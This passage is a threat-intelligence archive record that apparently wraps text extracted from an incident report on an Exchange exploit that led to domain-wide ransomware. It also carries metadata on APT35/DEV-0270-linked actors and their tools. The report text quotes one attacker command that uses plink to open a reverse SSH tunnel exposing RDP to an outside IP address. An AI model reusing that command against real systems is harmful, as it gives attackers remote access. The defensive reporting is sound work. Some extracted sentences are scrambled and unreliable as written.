Name or Location – T1036.005\r\nWindows Service – T1543.003\r\nData Encrypted for Impact – T1486\r\nWeb Shell – T1505.003\r\nSystem Information Discovery – T1082\r\nSystem Network Configuration Discovery – T1016\r\nSystem Owner/User Discovery – T1033\r\nWindows Command Shell – T1059.003\r\nInternal case #6898\r\nSource: https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 27 of 27\n\n  https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/ \nAnalysis and reporting completed by @0xtornado \u0026 @v3t0_\nReviewed by @samaritan_o \u0026 @svch0st \n   Page 4 of 27\n\nThe threat actors (tcp[.]symantecserver[.]co) also dropped and in order executed plink.exe, to reach the creating RDP port on a remote SSH the Exchange system tunnel to 148.251.71[.]182 over the internet:  \n\"powershell.exe\" /c echo y | plink.exe-N -T-R 0.0.0.0:1251:127.0.0.1:3389 148.251.71.182 -P 22 -l f\n   Page 10 of 27",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/"
	],
	"report_names": [
		"exchange-exploit-leads-to-domain-wide-ransomware"
	],
	"threat_actors": [
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b4a82e8-21f1-4bc7-84cf-e27334998b48",
			"created_at": "2022-10-25T16:07:23.84296Z",
			"updated_at": "2026-04-10T02:00:04.762229Z",
			"deleted_at": null,
			"main_name": "DEV-0270",
			"aliases": [
				"DEV-0270",
				"DireFate",
				"Lord Nemesis",
				"Nemesis Kitten",
				"Yellow Dev 23",
				"Yellow Dev 24"
			],
			"source_name": "ETDA:DEV-0270",
			"tools": [
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"WmiExec"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eaef3218-1f8c-4767-b1ff-da7a6662acc0",
			"created_at": "2023-03-04T02:01:54.110909Z",
			"updated_at": "2026-04-10T02:00:03.359871Z",
			"deleted_at": null,
			"main_name": "DEV-0270",
			"aliases": [
				"Nemesis Kitten",
				"Storm-0270"
			],
			"source_name": "MISPGALAXY:DEV-0270",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7",
			"created_at": "2025-08-07T02:03:24.764883Z",
			"updated_at": "2026-04-10T02:00:03.611225Z",
			"deleted_at": null,
			"main_name": "COBALT MIRAGE",
			"aliases": [
				"DEV-0270 ",
				"Nemesis Kitten ",
				"PHOSPHORUS ",
				"TunnelVision ",
				"UNC2448 "
			],
			"source_name": "Secureworks:COBALT MIRAGE",
			"tools": [
				"BitLocker",
				"Custom powershell scripts",
				"DiskCryptor",
				"Drokbk",
				"FRPC",
				"Fast Reverse Proxy (FRP)",
				"Impacket wmiexec",
				"Ngrok",
				"Plink",
				"PowerLessCLR",
				"TunnelFish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441555,
	"ts_updated_at": 1775792040,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/39a7c810ea0bbe87870f054ce243a272e263efaf.pdf",
		"text": "https://archive.orkl.eu/39a7c810ea0bbe87870f054ce243a272e263efaf.txt",
		"img": "https://archive.orkl.eu/39a7c810ea0bbe87870f054ce243a272e263efaf.jpg"
	}
}